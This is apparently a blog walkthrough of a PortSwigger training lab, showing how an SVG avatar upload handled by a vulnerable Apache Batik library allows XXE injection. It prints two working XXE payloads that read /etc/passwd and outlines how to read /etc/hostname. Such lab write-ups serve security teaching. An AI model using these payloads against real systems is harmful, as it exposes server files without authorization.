PortSwigger Lab: Exploiting XXE via image file upload | WalkThrough

Introduction

Hello everyone in this post I am going to share the writeup of PortSwigger Lab( Exploiting XXE via image file upload) . The comment section is using upload avatar function which is using a older version of Apache Batik library that is vulnerable to XXE injection. We will use this vulnerability to read the contents of /etc/hostname file and solve the lab .

Target

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.

Detection

In every post there is a comment section , here we can upload our avatars . Since we already know that server is using Apache Batik Library.

After searching the vulnerabilities for Apache Batik Library I came through this article.

In this vulnerability the web application offers its clients to upload a scalable vector graphics document SVG file and receive the contents of the file as a rasterized JPG or PNG file. Due to the fact that SVG files use XML for its representation the parsing routine is potentially prone to XXE injection attacks.

so make a file test.svg and paste the payload given below

 <?xml version=”1.0" standalone=”yes”?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM “file:///etc/passwd” > ]><svg width=”500px” height=”40px” xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink" version=”1.1">&xxe;</svg>

After sending the payload , right click on your profile and click on view image . The image is empty , which shows that the website is vulnerable to this exploit.

Exploitation

Now replace the content of test.svg with this

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [  <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg  width="500px" height="100px" xmlns="http://www.w3.org/2000/svg"  xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text  font-family="Verdana" font-size="16" x="10"  y="40">&xxe;</text></svg>

we can see something is written but it is too small to be visible.

After changing the width and height of the payload (500px :500px ) , lets try testing it again.

/etc/passwd is now clear and visible.

Now lets see the content of /etc/hostname .

Submit the host name to complete the lab .

Reference

→ https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015–0250/

→ https://en.wikipedia.org/wiki/Scalable_Vector_Graphics